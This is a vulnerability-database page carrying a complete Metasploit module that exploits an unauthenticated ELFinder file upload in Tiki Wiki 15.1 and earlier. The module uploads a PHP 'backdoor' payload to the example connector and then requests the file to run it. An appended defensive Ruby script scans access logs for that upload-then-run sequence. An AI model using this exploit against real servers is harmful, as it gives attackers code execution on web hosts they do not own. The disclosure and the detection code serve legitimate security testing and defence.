Tiki Wiki Unauthenticated File Upload Vulnerability

11 Jul 2016 19:07:44 | Reported by Mehmet Ince <[email protected]> | Type: metasploit | Source: www.rapid7.com

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tiki Wiki Unauthenticated File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a file upload vulnerability in Tiki Wiki <= 15.1
        which could be abused to allow unauthenticated users to execute arbitrary code
        under the context of the web server user.

        The issue is in one of the third-party components, ELFinder version 2.0.
        This component ships with a default example page that demonstrates file
        operations such as upload, remove, rename and create directory. The default
        configuration does not enforce validation of file extension, content type, etc.,
        so an unauthenticated user can upload a PHP file.

        The exploit has been tested on Debian 8.x 64-bit and Tiki Wiki 15.1.
      },
      'Author'         =>
        [
          'Mehmet Ince <[email protected]>' # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'https://www.mehmetince.net/exploit/tiki-wiki-unauthenticated-file-upload-vulnerability' ],
          [ 'URL', 'https://tiki.org/article434-Security-update-Tiki-15-2-Tiki-14-4-and-Tiki-12-9-released' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2016-07-11'
      ))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "Installed path of Tiki Wiki", "/tiki/"])
        ])
  end

  def check
    url = normalize_uri(target_uri.path, "vendor_extra/elfinder/elfinder.html")
    res = send_request_cgi(
        'method'  => 'GET',
        'uri'     =>  url
    )

    if res && res.code == 200
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    filename = rand_text_alpha(8 + rand(4)) + '.php'
    register_file_for_cleanup(filename)

    data = Rex::MIME::Message.new
    data.add_part('upload', nil, nil, 'form-data; name="cmd"')
    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")

    print_status("Uploading backdoor file: #{filename}")

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "vendor_extra/elfinder/php/connector.minimal.php"),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s
    })

    if res && res.code == 200
      print_good("Backdoor successfully created.")
    else
      fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
    end

    print_status("Triggering the exploit...")
    send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path, "vendor_extra/elfinder/files/" + filename)
    }, 5)
  end
end
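
Detection side of the module above, as an added example that is not part of the Metasploit module or Rapid7's code: it scans web access logs for a POST to the ELFinder example connector and for requests to script files under the ELFinder files directory, both paths taken from the module. The Apache combined log format, the severity labels and the sample log lines are assumptions constructed for illustration.

```ruby
# Added example: flag the request pattern of the module above in web access logs.
# SAMPLE_LOG holds constructed lines in Apache combined format (an assumption).
CONNECTOR = %r{/vendor_extra/elfinder/php/connector\.minimal\.php}i
DROPPED   = %r{/vendor_extra/elfinder/files/[^?\s]*\.(?:php\d?|phtml|phar)(?:[/?]|$)}i
LINE      = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) /

SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [11/Jul/2016:19:02:10 +0000] "GET /tiki/vendor_extra/elfinder/elfinder.html HTTP/1.1" 200 1532 "-" "-"
  198.51.100.7 - - [11/Jul/2016:19:02:11 +0000] "POST /tiki/vendor_extra/elfinder/php/connector.minimal.php HTTP/1.1" 200 412 "-" "-"
  198.51.100.7 - - [11/Jul/2016:19:02:12 +0000] "GET /tiki/vendor_extra/elfinder/files/QwErTyUi.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.20 - - [11/Jul/2016:19:05:00 +0000] "GET /tiki/tiki-index.php HTTP/1.1" 200 9120 "-" "-"
  203.0.113.21 - - [11/Jul/2016:19:06:00 +0000] "GET /tiki/vendor_extra/elfinder/files/notes.txt HTTP/1.1" 200 88 "-" "-"
LOG

# Returns one finding per client that touched the connector or a script in files/.
def scan_elfinder_activity(log_text)
  by_client = Hash.new { |h, k| h[k] = { uploads: [], executions: [] } }
  log_text.each_line do |raw|
    m = LINE.match(raw) or next               # skip lines that do not parse
    ip, ts, verb, path, status = m.captures
    next unless status.to_i.between?(200, 399) # ignore requests the server refused
    if verb == 'POST' && path =~ CONNECTOR
      by_client[ip][:uploads] << ts
    elsif path =~ DROPPED
      by_client[ip][:executions] << path
    end
  end
  by_client.map do |ip, ev|
    # Connector POST plus a script fetched from files/ by the same client is the
    # full upload-then-run sequence; either half alone is still worth a look.
    severity = if ev[:uploads].any? && ev[:executions].any? then :high
               elsif ev[:executions].any? then :medium
               else :low
               end
    { client: ip, severity: severity, uploads: ev[:uploads].size, scripts: ev[:executions].uniq }
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_elfinder_activity(SAMPLE_LOG).each { |finding| puts finding }
end
```

Any script file found under vendor_extra/elfinder/files/ on disk deserves the same scrutiny as a log hit, since the module registers its upload for cleanup and the log may be the only trace left.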
